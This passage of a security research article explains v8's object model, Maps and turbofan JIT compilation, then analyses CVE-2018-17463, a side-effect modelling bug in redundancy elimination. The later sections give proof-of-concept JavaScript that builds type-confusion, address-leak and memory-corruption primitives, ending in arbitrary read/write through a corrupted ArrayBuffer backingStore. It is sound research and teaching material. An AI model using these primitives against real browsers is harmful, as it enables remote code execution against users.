    The different JavaScript value types in v8 are listed in src/objects.h, of
    which an excerpt is shown below.
    
        // Inheritance hierarchy:
        // - Object
        //   - Smi          (immediate small integer)
        //   - HeapObject   (superclass for everything allocated in the heap)
        //     - JSReceiver  (suitable for property access)
        //       - JSObject
        //     - Name
        //       - String
        //     - HeapNumber
        //     - Map
        //     ...
    
    A JavaScript value is then represented as a tagged pointer of static type
    Object*. On 64-bit architectures, the following tagging scheme is used:
    
        Smi:        [32 bit signed int] [31 bits unused] 0
        HeapObject: [64 bit direct pointer]            | 01
    
    As such, the pointer tag differentiates between Smis and HeapObjects. All
    further type information is then stored in a Map instance to which a
    pointer can be found in every HeapObject at offset 0.
    
    With this pointer tagging scheme, arithmetic or binary operations on Smis
    can often ignore the tag as the lower 32 bits will be all zeroes. However,
    dereferencing a HeapObject requires masking off the least significant bit
    (LSB) first. For that reason, all accesses to data members of a HeapObject
    have to go through special accessors that take care of clearing the LSB. In
    fact, Objects in v8 do not have any C++ data members, as access to those
    would be impossible due to the pointer tag. Instead, the engine stores data
    members at predefined offsets in an object through mentioned accessor
    functions. In essence, v8 thus defines the in-memory layout of Objects
    itself instead of delegating this to the compiler.
    
    ----[ 1.2 - Maps
    
    The Map is a key data structure in v8, containing information such as
    
    * The dynamic type of the object, i.e. String, Uint8Array, HeapNumber, ...
    * The size of the object in bytes
    * The properties of the object and where they are stored
    * The type of the array elements, e.g. unboxed doubles or tagged pointers
    * The prototype of the object if any
    
    While the property names are usually stored in the Map, the property values
    are stored with the object itself in one of several possible regions. The
    Map then provides the exact location of the property value in the
    respective region.
    
    In general there are three different regions in which property values can
    be stored: inside the object itself ("inline properties"), in a separate,
    dynamically sized heap buffer ("out-of-line properties"), or, if the
    property name is an integer index [4], as array elements in a
    dynamically-sized heap array. In the first two cases, the Map will store
    the slot number of the property value while in the last case the slot
    number is the element index. This can be seen in the following example:
    
        let o1 = {a: 42, b: 43};
        let o2 = {a: 1337, b: 1338};
    
    After execution, there will be two JSObjects and one Map in memory:
    
                          +----------------+
                          |                |
                          | map1           |
                          |                |
                          | property: slot |
                          |      .a : 0    |
                          |      .b : 1    |
                          |                |
                          +----------------+
                              ^         ^
        +--------------+      |         |
        |              +------+         |
        |    o1        |           +--------------+
        |              |           |              |
        | slot : value |           |    o2        |
        |    0 : 42    |           |              |
        |    1 : 43    |           | slot : value |
        +--------------+           |    0 : 1337  |
                                   |    1 : 1338  |
                                   +--------------+
    
    As Maps are relatively expensive objects in terms of memory usage, they are
    shared as much as possible between "similar" objects. This can be seen in
    the previous example, where both o1 and o2 share the same Map, map1.
    However, if a third property .c (e.g. with value 1339) is added to o1, then
    the Map can no longer be shared as o1 and o2 now have different properties.
    As such, a new Map is created for o1:
    
           +----------------+       +----------------+
           |                |       |                |
           | map1           |       | map2           |
           |                |       |                |
           | property: slot |       | property: slot |
           | .a      : 0    |       | .a      : 0    |
           | .b      : 1    |       | .b      : 1    |
           |                |       | .c      : 2    |
           +----------------+       +----------------+
                   ^                        ^
                   |                        |
                   |                        |
            +--------------+         +--------------+
            |              |         |              |
            |    o2        |         |    o1        |
            |              |         |              |
            | slot : value |         | slot : value |
            |    0 : 1337  |         |    0 : 1337  |
            |    1 : 1338  |         |    1 : 1338  |
            +--------------+         |    2 : 1339  |
                                     +--------------+
    
    If later on the same property .c was added to o2 as well, then both objects
    would again share map2. The way this works efficiently is by keeping track
    in each Map which new Map an object should be transitioned to if a property
    of a certain name (and possibly type) is added to it. This data structure
    is commonly called a transition table.
    
    V8 is, however, also capable of storing the properties as a hash map
    instead of using the Map and slot mechanism, in which case the property
    name is directly mapped to the value. This is used in cases when the engine
    believes that the Map mechanism will induce additional overhead, such as
    e.g. in the case of singleton objects.
    
    The Map mechanism is also essential for garbage collection: when the
    collector processes an allocation (a HeapObject), it can immediately
    retrieve information such as the object's size and whether the object
    contains any other tagged pointers that need to be scanned by inspecting
    the Map.
    
    ----[ 1.3 - Object Summary
    
    Consider the following code snippet
    
    	let obj = {
    	  x: 0x41,
    	  y: 0x42
    	};
    	obj.z = 0x43;
    	obj[0] = 0x1337;
    	obj[1] = 0x1338;
    
    After execution in v8, inspecting the memory address of the object shows:
    
    	(lldb) x/5gx 0x23ad7c58e0e8
        0x23ad7c58e0e8: 0x000023adbcd8c751 0x000023ad7c58e201
        0x23ad7c58e0f8: 0x000023ad7c58e229 0x0000004100000000
        0x23ad7c58e108: 0x0000004200000000
    
        (lldb) x/3gx 0x23ad7c58e200
        0x23ad7c58e200: 0x000023adafb038f9 0x0000000300000000
        0x23ad7c58e210: 0x0000004300000000
    
        (lldb) x/6gx 0x23ad7c58e228
        0x23ad7c58e228: 0x000023adafb028b9 0x0000001100000000
        0x23ad7c58e238: 0x0000133700000000 0x0000133800000000
        0x23ad7c58e248: 0x000023adafb02691 0x000023adafb02691
        ...
    
    First is the object itself which consists of a pointer to its Map
    (0x23adbcd8c751), the pointer to its out-of-line properties
    (0x23ad7c58e201), the pointer to its elements (0x23ad7c58e229), and the two
    inline properties (x and y). Inspecting the out-of-line properties pointer
    shows another object that starts with a Map (which indicates that this is a
    FixedArray) followed by the size and the property z. The elements array
    again starts with a pointer to the Map, followed by the capacity, followed
    by the two elements with index 0 and 1 and 9 further elements set to the
    magic value "the_hole" (indicating that the backing memory has been
    overcommitted). As can be seen, all values are stored as tagged pointers.
    If further objects were created in the same fashion, they would reuse the
    existing Map.
    
    
    --[ 2 - An Introduction to Just-in-Time Compilation for JavaScript
    
    Modern JavaScript engines typically employ an interpreter and one or
    multiple just-in-time compilers. As a unit of code is executed more
    frequently, it is moved to higher tiers which are capable of executing the
    code faster, although their startup time is usually higher as well.
    
    The next section aims to give an intuitive introduction rather than a
    formal explanation of how JIT compilers for dynamic languages such as
    JavaScript manage to produce optimized machine code from a script.
    
    ----[ 2.1 - Speculative Just-in-Time Compilation
    
    Consider the following two code snippets. How could each of them be
    compiled to machine code?
    
        // C++
        int add(int a, int b) {
            return a + b;
        }
    
        // JavaScript
        function add(a, b) {
            return a + b;
        }
    
    The answer seems rather clear for the first code snippet. After all, the
    types of the arguments as well as the ABI, which specifies the registers
    used for parameters and return values, are known. Further, the instruction
    set of the target machine is available. As such, compilation to machine
    code might produce the following x86_64 code:
    
        lea eax, [rdi + rsi]
        ret
    
    However, for the JavaScript code, type information is not known. As such,
    it seems impossible to produce anything better than the generic add
    operation handler [5], which would only provide a negligible performance
    boost over the interpreter. As it turns out, dealing with missing type
    information is a key challenge to overcome for compiling dynamic languages
    to machine code. This can also be seen by imagining a hypothetical
    JavaScript dialect which uses static typing, for example:
    
        function add(a: Smi, b: Smi) -> Smi {
            return a + b;
        }
    
    In this case, it is again rather easy to produce machine code:
    
        lea     rax, [rdi+rsi]
        jo      bailout_integer_overflow
        ret
    
    This is possible because the lower 32 bits of a Smi will be all zeroes due
    to the pointer tagging scheme. This assembly code looks very similar to the
    C++ example, except for the additional overflow check, which is required
    since JavaScript does not know about integer overflows (in the
    specification all numbers are IEEE 754 double precision floating point
    numbers), but CPUs certainly do. As such, in the unlikely event of an
    integer overflow, the engine would have to transfer execution to a
    different, more generic execution tier like the interpreter. There it would
    repeat the failed operation and in this case convert both inputs to
    floating point numbers prior to adding them together. This mechanism is
    commonly called bailout and is essential for JIT compilers, as it allows
    them to produce specialized code which can always fall back to more generic
    code if an unexpected situation occurs.
    
    Unfortunately, for plain JavaScript the JIT compiler does not have the
    comfort of static type information. However, as JIT compilation only
    happens after several executions in a lower tier, such as the interpreter,
    the JIT compiler can use type information from previous executions. This,
    in turn, enables speculative optimization: the compiler will assume that a
    unit of code will be used in a similar way in the future and thus see the
    same types for e.g. the arguments. It can then produce optimized code like
    the one shown above assuming that the types will be used in the future.
    
    ----[ 2.2 Speculation Guards
    
    Of course, there is no guarantee that a unit of code will always be used in
    a similar way. As such, the compiler must verify that all of its type
    speculations still hold at runtime before executing the optimized code.
    This is accomplished through a number of lightweight runtime checks,
    discussed next.
    
    By inspecting feedback from previous executions and the current engine
    state, the JIT compiler first formulates various speculations such as "this
    value will always be a Smi", or "this value will always be an object with a
    specific Map", or even "this Smi addition will never cause an integer
    overflow". Each of these speculations is then verified to still hold at
    runtime with a short piece of machine code, called a speculation guard. If
    the guard fails, it will perform a bailout to a lower execution tier such
    as the interpreter. Below are two commonly used speculation guards:
    
        ; Ensure is Smi
        test    rdi, 0x1
        jnz     bailout
    
        ; Ensure has expected Map
        cmp    QWORD PTR [rdi-0x1], 0x12345601
        jne    bailout
    
    The first guard, a Smi guard, verifies that some value is a Smi by checking
    that the pointer tag is zero. The second guard, a Map guard, verifies that
    a HeapObject in fact has the Map that it is expected to have.
    
    Using speculation guards, dealing with missing type information becomes:
    
        0. Gather type profiles during execution in the interpreter
    
        1. Speculate that the same types will be used in the future
    
        2. Guard those speculations with runtime speculation guards
    
        3. Afterwards, produce optimized code for the previously seen types
    
    In essence, inserting a speculation guard adds a piece of static type
    information to the code following it.
    
    ----[ 2.3 Turbofan
    
    Even though an internal representation of the user's JavaScript code is
    already available in the form of bytecode for the interpreter, JIT
    compilers commonly convert the bytecode to a custom intermediate
    representation (IR) which is better suited for the various optimizations
    performed. Turbofan, the JIT compiler inside v8, is no exception. The IR
    used by turbofan is graph-based, consisting of operations (nodes) and
    different types of edges between them, namely
    
        * control-flow edges, connecting control-flow operations such as loops
          and if conditions
    
        * data-flow edges, connecting input and output values
    
        * effect-flow edges, which connect effectual operations such that they
          are scheduled correctly. For example: consider a store to a property
          followed by a load of the same property. As there is no data- or
          control-flow dependency between the two operations, effect-flow is
          needed to correctly schedule the store before the load.
    
    Further, the turbofan IR supports three different types of operations:
    JavaScript operations, simplified operations, and machine operations.
    Machine operations usually resemble a single machine instruction while JS
    operations resemble a generic bytecode instruction. Simplified operations
    are somewhere in between. As such, machine operations can directly be
    translated into machine instructions while the other two types of
    operations require further conversion steps to lower-level operations (a
    process called lowering). For example, the generic property load operations
    could be lowered to a CheckHeapObject and CheckMaps operation followed by a
    8-byte load from an inline slot of an object.
    
    A comfortable way to study the behavior of the JIT compiler in various
    scenarios is through v8's turbolizer tool [6]: a small web application that
    consumes the output produced by the --trace-turbo command line flag and
    renders it as an interactive graph.
    
    ----[ 2.4 Compiler Pipeline
    
    Given the previously described mechanisms, a typical JavaScript JIT
    compiler pipeline then looks roughly as follows:
    
        0. Graph building and specialization: the bytecode as well as runtime
        type profiles from the interpreter are consumed and an IR graph,
        representing the same computations, is constructed. Type profiles are
        inspected and based on them speculations are formulated, e.g. about
        which types of values to see for an operation. The speculations are
        guarded with speculation guards.
    
        1. Optimization: the resulting graph, which now has static type
        information due to the guards, is optimized much like "classic"
        ahead-of-time (AOT) compilers do. Here an optimization is defined as a
        transformation of code that is not required for correctness but
        improves the execution speed or memory footprint of the code. Typical
        optimizations include loop-invariant code motion, constant folding,
        escape analysis, and inlining.
    
        2. Lowering: finally, the resulting graph is lowered to machine code
        which is then written into an executable memory region. From that point
        on, invoking the compiled function will result in a transfer of
        execution to the generated code.
    
    This structure is rather flexible though. For example, lowering could
    happen in multiple stages, with further optimizations in between them. In
    addition, register allocation has to be performed at some point, which is,
    however, also an optimization to some degree.
    
    ----[ 2.5 - A JIT Compilation Example
    
    This chapter is concluded with an example of the following function being
    JIT compiled by turbofan:
    
        function foo(o) {
            return o.b;
        }
    
    During parsing, the function would first be compiled to generic bytecode,
    which can be inspected using the --print-bytecode flag for d8. The output
    is shown below.
    
        Parameter count 2
        Frame size 0
           12 E> 0 : a0                StackCheck
           31 S> 1 : 28 02 00 00       LdaNamedProperty a0, [0], [0]
           33 S> 5 : a4                Return
        Constant pool (size = 1)
        0x1fbc69c24ad9: [FixedArray] in OldSpace
         - map: 0x1fbc6ec023c1 <Map>
         - length: 1
                   0: 0x1fbc69c24301 <String[1]: b>
    
    The function is mainly compiled to two operations: LdaNamedProperty, which
    loads property .b of the provided argument, and Return, which returns said
    property. The StackCheck operation at the beginning of the function guards
    against stack overflows by throwing an exception if the call stack size is
    exceeded. More information about v8's bytecode format and interpreter can
    be found online [7].
    
    To trigger JIT compilation, the function has to be invoked several times:
    
        for (let i = 0; i < 100000; i++) {
            foo({a: 42, b: 43});
        }
    
        /* Or by using a native after providing some type information: */
        foo({a: 42, b: 43});
        foo({a: 42, b: 43});
        %OptimizeFunctionOnNextCall(foo);
        foo({a: 42, b: 43});
    
    This will also inhabit the feedback vector of the function which associates
    observed input types with bytecode operations. In this case, the feedback
    vector entry for the LdaNamedProperty would contain a single entry: the Map
    of the objects that were given to the function as argument. This Map will
    indicate that property .b is stored in the second inline slot.
    
    Once turbofan starts compiling, it will build a graph representation of the
    JavaScript code. It will also inspect the feedback vector and, based on
    that, speculate that the function will always be called with an object of a
    specific Map. Next, it guards these assumptions with two runtime checks,
    which will bail out to the interpreter if the assumptions ever turn out to
    be false, then proceeds to emit a property load for an inline property.
    The optimized graph will ultimately look similar to the one shown below.
    Here, only data-flow edges are shown.
    
            +----------------+
            |                |
            |  Parameter[1]  |
            |                |
            +-------+--------+
                    |                   +-------------------+
                    |                   |                   |
                    +------------------->  CheckHeapObject  |
                                        |                   |
                                        +----------+--------+
              +------------+                       |
              |            |                       |
              |  CheckMap  <-----------------------+
              |            |
              +-----+------+
                    |                   +------------------+
                    |                   |                  |
                    +------------------->  LoadField[+32]  |
                                        |                  |
                                        +----------+-------+
               +----------+                        |
               |          |                        |
               |  Return  <------------------------+
               |          |
               +----------+
    
    This graph will then be lowered to machine code similar to the following.
    
        ; Ensure o is not a Smi
        test    rdi, 0x1
        jz      bailout_not_object
    
        ; Ensure o has the expected Map
        cmp     QWORD PTR [rdi-0x1], 0xabcd1234
        jne     bailout_wrong_map
    
        ; Perform operation for object with known Map
        mov     rax, [rdi+0x1f]
        ret
    
    If the function were to be called with an object with a different Map, the
    second guard would fail, causing a bailout to the interpreter (more
    precisely to the LdaNamedProperty operation of the bytecode) and likely the
    discarding of the compiled code. Eventually, the function would be
    recompiled to take the new type feedback into account. In that case, the
    function would be re-compiled to perform a polymorphic property load
    (supporting more than one input type), e.g. by emitting code for the
    property load for both Maps, then jumping to the respective one depending
    on the current Map. If the operation becomes even more polymorphic, the
    compiler might decide to use a generic inline cache (IC) [8][9] for
    the polymorphic operation. An IC caches previous lookups but can always
    fall-back to the runtime function for previously unseen input types without
    bailing out of the JIT code.
    
    
    --[ 3 - JIT Compiler Vulnerabilities
    
    JavaScript JIT compilers are commonly implemented in C++ and as such are
    subject to the usual list of memory- and type-safety violations. These are
    not specific to JIT compilers and will thus not be discussed further.
    Instead, the focus will be put on bugs in the compiler which lead to
    incorrect machine code generation which can then be exploited to cause
    memory corruption.
    
    Besides bugs in the lowering phases [10][11] which often result in rather
    classic vulnerabilities like integer overflows in the generated machine
    code, many interesting bugs come from the various optimizations. There have
    been bugs in bounds-check elimination [12][13][14][15], escape analysis
    [16][17], register allocation [18], and others. Each optimization pass
    tends to yield its own kind of vulnerabilities.
    
    When auditing complex software such as JIT compilers, it is often a
    sensible approach to determine specific vulnerability patterns in advance
    and look for instances of them. This is also a benefit of manual code
    auditing: knowing that a particular type of bug usually leads to a simple,
    reliable exploit, this is what the auditor can look for specifically.
    
    As such, a specific optimization, namely redundancy elimination, will be
    discussed next, along with the type of vulnerability one can find there and
    a concrete vulnerability, CVE-2018-17463, accompanied with an exploit.
    
    ----[ 3.1 - Redundancy Elimination
    
    One popular class of optimizations aims to remove safety checks from the
    emitted machine code if they are determined to be unnecessary. As can be
    imagined, these are very interesting for the auditor as a bug in those will
    usually result in some kind of type confusion or out-of-bounds access.
    
    One instance of these optimization passes, often called "redundancy
    elimination", aims to remove redundant type checks. As an example, consider
    the following code:
    
        function foo(o) {
            return o.a + o.b;
        }
    
    Following the JIT compilation approach outlined in chapter 2, the following
    IR code might be emitted for it:
    
        CheckHeapObject o
        CheckMap o, map1
        r0 = Load [o + 0x18]
    
        CheckHeapObject o
        CheckMap o, map1
        r1 = Load [o + 0x20]
    
        r2 = Add r0, r1
        CheckNoOverflow
        Return r2
    
    The obvious issue here is the redundant second pair of CheckHeapObject and
    CheckMap operations. In that case it is clear that the Map of o can not
    change between the two CheckMap operations. The goal of redundancy
    elimination is thus to detect these types of redundant checks and remove
    all but the first one on the same control-flow path.
    
    However, certain operations can cause side-effects: observable changes to
    the execution context. For example, a Call operation invoking a user
    supplied function could easily cause an object’s Map to change, e.g. by
    adding or removing a property. In that case, a seemingly redundant check is
    in fact required as the Map could change in between the two checks. As such
    it is essential for this optimization that the compiler knows about all
    effectful operations in its IR. Unsurprisingly, correctly predicting side
    effects of JIT operations can be quite hard due to to the nature of the
    JavaScript language. Bugs related to incorrect side effect predictions thus
    appear from time to time and are typically exploited by tricking the
    compiler into removing a seemingly redundant type check, then invoking the
    compiled code such that an object of an unexpected type is used without a
    preceding type check. Some form of type confusion then follows.
    
    Vulnerabilities related to incorrect modeling of side-effect can usually be
    found by locating IR operations which are assumed side-effect free by the
    engine, then verifying whether they really are side-effect free in all
    cases. This is how CVE-2018-17463 was found.
    
    ----[ 3.2 CVE-2018-17463
    
    In v8, IR operations have various flags associated with them. One of them,
    kNoWrite, indicates that the engine assumes that an operation will not have
    observable side-effects, it does not "write" to the effect chain. An
    example for such an operation was JSCreateObject, shown below:
    
        #define CACHED_OP_LIST(V)                                            \
          ...                                                                \
          V(CreateObject, Operator::kNoWrite, 1, 1)                          \
          ...
    
    To determine whether an IR operation might have side-effects it is often
    necessary to look at the lowering phases which convert high-level
    operations, such as JSCreateObject, into lower-level instruction and
    eventually machine instructions. For JSCreateObject, the lowering happens
    in js-generic-lowering.cc, responsible for lowering JS operations:
    
        void JSGenericLowering::LowerJSCreateObject(Node* node) {
          CallDescriptor::Flags flags = FrameStateFlagForCall(node);
          Callable callable = Builtins::CallableFor(
              isolate(), Builtins::kCreateObjectWithoutProperties);
          ReplaceWithStubCall(node, callable, flags);
        }
    
    In plain english, this means that a JSCreateObject operation will be
    lowered to a call to the runtime function CreateObjectWithoutProperties.
    This function in turn ends up calling ObjectCreate, another builtin but
    this time implemented in C++. Eventually, control flow ends up in
    JSObject::OptimizeAsPrototype. This is interesting as it seems to imply
    that the prototype object may potentially be modified during said
    optimization, which could be an unexpected side-effect for the JIT
    compiler. The following code snippet can be run to check whether
    OptimizeAsPrototype modifies the object in some way:
    
        let o = {a: 42};
        %DebugPrint(o);
        Object.create(o);
        %DebugPrint(o);
    
    Indeed, running it with `d8 --allow-natives-syntax` shows:
    
        DebugPrint: 0x3447ab8f909: [JS_OBJECT_TYPE]
        - map: 0x0344c6f02571 <Map(HOLEY_ELEMENTS)> [FastProperties]
        ...
    
        DebugPrint: 0x3447ab8f909: [JS_OBJECT_TYPE]
        - map: 0x0344c6f0d6d1 <Map(HOLEY_ELEMENTS)> [DictionaryProperties]
    
    As can be seen, the object's Map has changed when becoming a prototype so
    the object must have changed in some way as well. In particular, when
    becoming a prototype, the out-of-line property storage of the object was
    converted to dictionary mode. As such the pointer at offset 8 from the
    object will no longer point to a PropertyArray (all properties one after
    each other, after a short header), but instead to a NameDictionary (a more
    complex data structure directly mapping property names to values without
    relying on the Map). This certainly is a side effect and in this case an
    unexpected one for the JIT compiler. The reason for the Map change is that
    in v8, prototype Maps are never shared due to clever optimization tricks in
    other parts of the engine [19].
    
    At this point it is time to construct a first proof-of-concept for the bug.
    The requirements to trigger an observable misbehavior in a compiled
    function are:
    
        0. The function must receive an object that is not currently used as a
        prototype.
    
        1. The function needs to perform a CheckMap operation so that
        subsequent ones can be eliminated.
    
        2. The function needs to call Object.create with the object as argument
        to trigger the Map transition.
    
        3. The function needs to access an out-of-line property. This will,
        after a CheckMap that will later be incorrectly eliminated, load the
        pointer to the property storage, then deference that believing that it
        is pointing to a PropertyArray even though it will point to a
        NameDictionary.
    
    The following JavaScript code snippet accomplishes this
    
        function hax(o) {
            // Force a CheckMaps node.
            o.a;
    
            // Cause unexpected side-effects.
            Object.create(o);
    
            // Trigger type-confusion because CheckMaps node is removed.
            return o.b;
        }
    
        for (let i = 0; i < 100000; i++) {
            let o = {a: 42};
            o.b = 43;           // will be stored out-of-line.
            hax(o);
        }
    
    It will first be compiled to pseudo IR code similar to the following:
    
        CheckHeapObject o
        CheckMap o, map1
        Load [o + 0x18]
    
        // Changes the Map of o
        Call CreateObjectWithoutProperties, o
    
        CheckMap o, map1
        r1 = Load [o + 0x8]         // Load pointer to out-of-line properties
        r2 = Load [r1 + 0x10]       // Load property value
    
        Return r2
    
    Afterwards, the redundancy elimination pass will incorrectly remove the
    second Map check, yielding:
    
        CheckHeapObject o
        CheckMap o, map1
        Load [o + 0x18]
    
        // Changes the Map of o
        Call CreateObjectWithoutProperties, o
    
        r1 = Load [o + 0x8]
        r2 = Load [r1 + 0x10]
    
        Return r2
    
    When this JIT code is run for the first time, it will return a different
    value than 43, namely an internal fields of the NameDictionary which
    happens to be located at the same offset as the .b property in the
    PropertyArray.
    
    Note that in this case, the JIT compiler tried to infer the type of the
    argument object at the second property load instead of relying on the type
    feedback and thus, assuming the map wouldn’t change after the first type
    check, produced a property load from a FixedArray instead of a
    NameDictionary.
    
    
    --[ 4 - Exploitation
    
    The bug at hand allows the confusion of a PropertyArray with a
    NameDictionary. Interestingly, the NameDictionary still stores the property
    values inside a dynamically sized inline buffer of (name, value, flags)
    triples. As such, there likely exists a pair of properties P1 and P2 such
    that both P1 and P2 are located at offset O from the start of either the
    PropertyArray or the NameDictionary respectively. This is interesting for
    reasons explained in the next section. Shown next is the memory dump of the
    PropertyArray and NameDictionary for the same properties side by side:
    
        let o = {inline: 42};
        o.p0 = 0; o.p1 = 1; o.p2 = 2; o.p3 = 3; o.p4 = 4;
        o.p5 = 5; o.p6 = 6; o.p7 = 7; o.p8 = 8; o.p9 = 9;
    
        0x0000130c92483e89         0x0000130c92483bb1
        0x0000000c00000000         0x0000006500000000
        0x0000000000000000         0x0000000b00000000
        0x0000000100000000         0x0000000000000000
        0x0000000200000000         0x0000002000000000
        0x0000000300000000         0x0000000c00000000
        0x0000000400000000         0x0000000000000000
        0x0000000500000000         0x0000130ce98a4341
        0x0000000600000000  <-!->  0x0000000200000000
        0x0000000700000000         0x000004c000000000
        0x0000000800000000         0x0000130c924826f1
        0x0000000900000000         0x0000130c924826f1
        ...                        ...
    
    In this case the properties p6 and p2 overlap after the conversion to
    dictionary mode. Unfortunately, the layout of the NameDictionary will be
    different in every execution of the engine due to some process-wide
    randomness being used in the hashing mechanism. It is thus necessary to
    first find such a matching pair of properties at runtime. The following
    code can be used for that purpose.
    
        function find_matching_pair(o) {
            let a = o.inline;
            this.Object.create(o);
            let p0 = o.p0;
            let p1 = o.p1;
            ...;
            return [p0, p1, ..., pN];
            let pN = o.pN;
        }
    
    Afterwards, the returned array is searched for a match. In case the exploit
    gets unlucky and doesn't find a matching pair (because all properties are
    stored at the end of the NameDictionaries inline buffer by bad luck), it is
    able to detect that and can simply retry with a different number of
    properties or different property names.
    
    ----[ 4.1 - Constructing Type Confusions
    
    There is an important bit about v8 that wasn't discussed yet. Besides the
    location of property values, Maps also store type information for
    properties. Consider the following piece of code:
    
        let o = {}
        o.a = 1337;
        o.b = {x: 42};
    
    After executing it in v8, the Map of o will indicate that the property .a
    will always be a Smi while property .b will be an Object with a certain Map
    that will in turn have a property .x of type Smi. In that case, compiling a
    function such as
    
        function foo(o) {
            return o.b.x;
        }
    
    will result in a single Map check for o but no further Map check for the .b
    property since it is known that .b will always be an Object with a specific
    Map. If the type information for a property is ever invalidated by
    assigning a property value of a different type, a new Map is allocated and
    the type information for that property is widened to include both the
    previous and the new type.
    
    With that, it becomes possible to construct a powerful exploit primitive
    from the bug at hand: by finding a matching pair of properties JIT code can
    be compiled which assumes it will load property p1 of one type but in
    reality ends up loading property p2 of a different type. Due to the type
    information stored in the Map, the compiler will, however, omit type checks
    for the property value, thus yielding a kind of universal type confusion: a
    primitive that allows one to confuse an object of type X with an object of
    type Y where both X and Y, as well as the operation that will be performed
    on type X in the JIT code, can be arbitrarily chosen. This is,
    unsurprisingly, a very powerful primitive.
    
    Below is the scaffold code for crafting such a type confusion primitive
    from the bug at hand. Here p1 and p2 are the property names of the two
    properties that overlap after the property storage is converted to
    dictionary mode. As they are not known in advance, the exploit relies on
    eval to generate the correct code at runtime.
    
        eval(`
            function vuln(o) {
                // Force a CheckMaps node
                let a = o.inline;
                // Trigger unexpected transition of property storage
                this.Object.create(o);
                // Seemingly load .p1 but really load .p2
                let p = o.${p1};
                // Use p (known to be of type X but really is of type Y)
                // ...;
            }
        `);
    
        let arg = makeObj();
        arg[p1] = objX;
        arg[p2] = objY;
        vuln(arg);
    
    In the JIT compiled function, the compiler will then know that the local
    variable p will be of type X due to the Map of o and will thus omit type
    checks for it. However, due to the vulnerability, the runtime code will
    actually receive an object of type Y, causing a type confusion.
    
    ----[ 4.2 - Gaining Memory Read/Write
    
    From here, additional exploit primitives will now be constructed: first a
    primitive to leak the addresses of JavaScript objects, second a primitive
    to overwrite arbitrary fields in an object. The address leak is possible by
    confusing the two objects in a compiled piece of code which fetches the .x
    property, an unboxed double, converts it to a v8 HeapNumber, and returns
    that to the caller. Due to the vulnerability, it will, however, actually
    load a pointer to an object and return that as a double.
    
        function vuln(o) {
            let a = o.inline;
            this.Object.create(o);
            return o.${p1}.x1;
        }
    
        let arg = makeObj();
        arg[p1] = {x: 13.37};       // X, inline property is an unboxed double
        arg[p2] = {y: obj};         // Y, inline property is a pointer
        vuln(arg);
    
    This code will result in the address of obj being returned to the caller
    as a double, such as 1.9381218278403e-310.
    
    Next, the corruption. As is often the case, the "write" primitive is just
    the inversion of the "read" primitive. In this case, it suffices to write
    to a property that is expected to be an unboxed double, such as shown next.
    
        function vuln(o) {
            let a = o.inline;
            this.Object.create(o);
            let orig = o.${p1}.x2;
            o.${p1}.x = ${newValue};
            return orig;
        }
    
        let arg = makeObj();
        arg[p1] = {x: 13.37};
        arg[p2] = {y: obj};
        vuln(arg);
    
    This will "corrupt" property .y of the second object with a controlled
    double. However, to achieve something useful, the exploit would likely need
    to corrupt an internal field of an object, such as is done below for an
    ArrayBuffer. Note that the second primitive will read the old value of the
    property and return that to the caller. This makes it possible to:
    
        * immediately detect once the vulnerable code ran for the first time
          and corrupted the victim object
    
        * fully restore the corrupted object at a later point to guarantee
          clean process continuation.
    
    With those primitives at hand, gaining arbitrary memory read/write becomes
    as easy as
    
        0. Creating two ArrayBuffers, ab1 and ab2
    
        1. Leaking the address of ab2
    
        2. Corrupting the backingStore pointer of ab1 to point to ab2
    
    Yielding the following situation:
    
        +-----------------+           +-----------------+
        |  ArrayBuffer 1  |     +---->|  ArrayBuffer 2  |
        |                 |     |     |                 |
        |  map            |     |     |  map            |
        |  properties     |     |     |  properties     |
        |  elements       |     |     |  elements       |
        |  byteLength     |     |     |  byteLength     |
        |  backingStore --+-----+     |  backingStore   |
        |  flags          |           |  flags          |
        +-----------------+           +-----------------+
    
    Afterwards, arbitrary addresses can be accessed by overwriting the
    backingStore pointer of ab2 by writing into ab1 and subsequently reading
    from or writing to ab2.
    
    ----[ 4.3 - Reflections
    
    As was demonstrated, by abusing the type inference system in v8, an
    initially limited type confusion primitive can be extended to achieve
    confusion of arbitrary objects in JIT code. This primitive is powerful for
    several reasons:
    
        0. The fact that the user is able to create custom types, e.g. by
        adding properties to objects. This avoids the need to find a good type
        confusion candidate as one can likely just create it, such as was done
        by the presented exploit when it confused an ArrayBuffer with an object
        with inline properties to corrupt the backingStore pointer.
    
        1. The fact that code can be JIT compiled that performs an arbitrary
        operation on an object of type X but at runtime receives an object of
        type Y due to the vulnerability. The presented exploit compiled loads
        and stores of unboxed double properties to achieve address leaks and
        the corruption of ArrayBuffers respectively.
    
        2. The fact that type information is aggressively tracked by the
        engines, increasing the number of types that can be confused with each
        other.
    
    As such, it can be desirable to first construct the discussed primitive
    from lower-level primitives if these aren't sufficient to achieve reliable
    memory read/write. It is likely that most type check elimination bugs can
    be turned into this primitive. Further, other types of vulnerabilities can
    potentially be exploited to yield it as well. Possible examples include
    register allocation bugs, use-after-frees, or out-of-bounds reads or
    writes into the property buffers of JavaScript objects.
    
    ----[ 4.4 Gaining Code Execution
    
    While previously an attacker could simply write shellcode into the JIT region
    and execute it, things have become slightly more time consuming: in early 2018,
    v8 introduced a feature called write-protect-code-memory [20] which essentially
    flips the JIT region's access permissions between R-X and RW-. With that, the
    JIT region will be mapped as R-X during execution of JavaScript code, thus
    preventing an attacker from directly writing into it. As such, one now needs
    to find another way to code execution, such as simply performing ROP by
    overwriting vtables, JIT function pointers, the stack, or through another
    method of one's choosing. This is left as an exercise for the reader.
    
    Afterwards, the only thing left to do is to run a sandbox escape... ;)
    
    
    --[ 5 - References
    
    [1] https://blogs.securiteam.com/index.php/archives/3783
    [2] https://cs.chromium.org/
    [3] https://v8.dev/
    [4] https://www.ecma-international.org/ecma-262/8.0/
    index.html#sec-array-exotic-objects
    [5] https://www.ecma-international.org/ecma-262/8.0/
    index.html#sec-addition-operator-plus
    [6] https://chromium.googlesource.com/v8/v8.git/+/6.9.427.19/
    tools/turbolizer/
    [7] https://v8.dev/docs/ignition
    [8] https://www.mgaudet.ca/technical/2018/6/5/
    an-inline-cache-isnt-just-a-cache
    [9] https://mathiasbynens.be/notes/shapes-ics
    [10] https://bugs.chromium.org/p/project-zero/issues/detail?id=1380
    [11] https://github.com/WebKit/webkit/commit/
    61dbb71d92f6a9e5a72c5f784eb5ed11495b3ff7
    [12] https://bugzilla.mozilla.org/show_bug.cgi?id=1145255
    [13] https://www.thezdi.com/blog/2017/8/24/
    deconstructing-a-winning-webkit-pwn2own-entry
    [14] https://bugs.chromium.org/p/chromium/issues/detail?id=762874
    [15] https://bugs.chromium.org/p/project-zero/issues/detail?id=1390
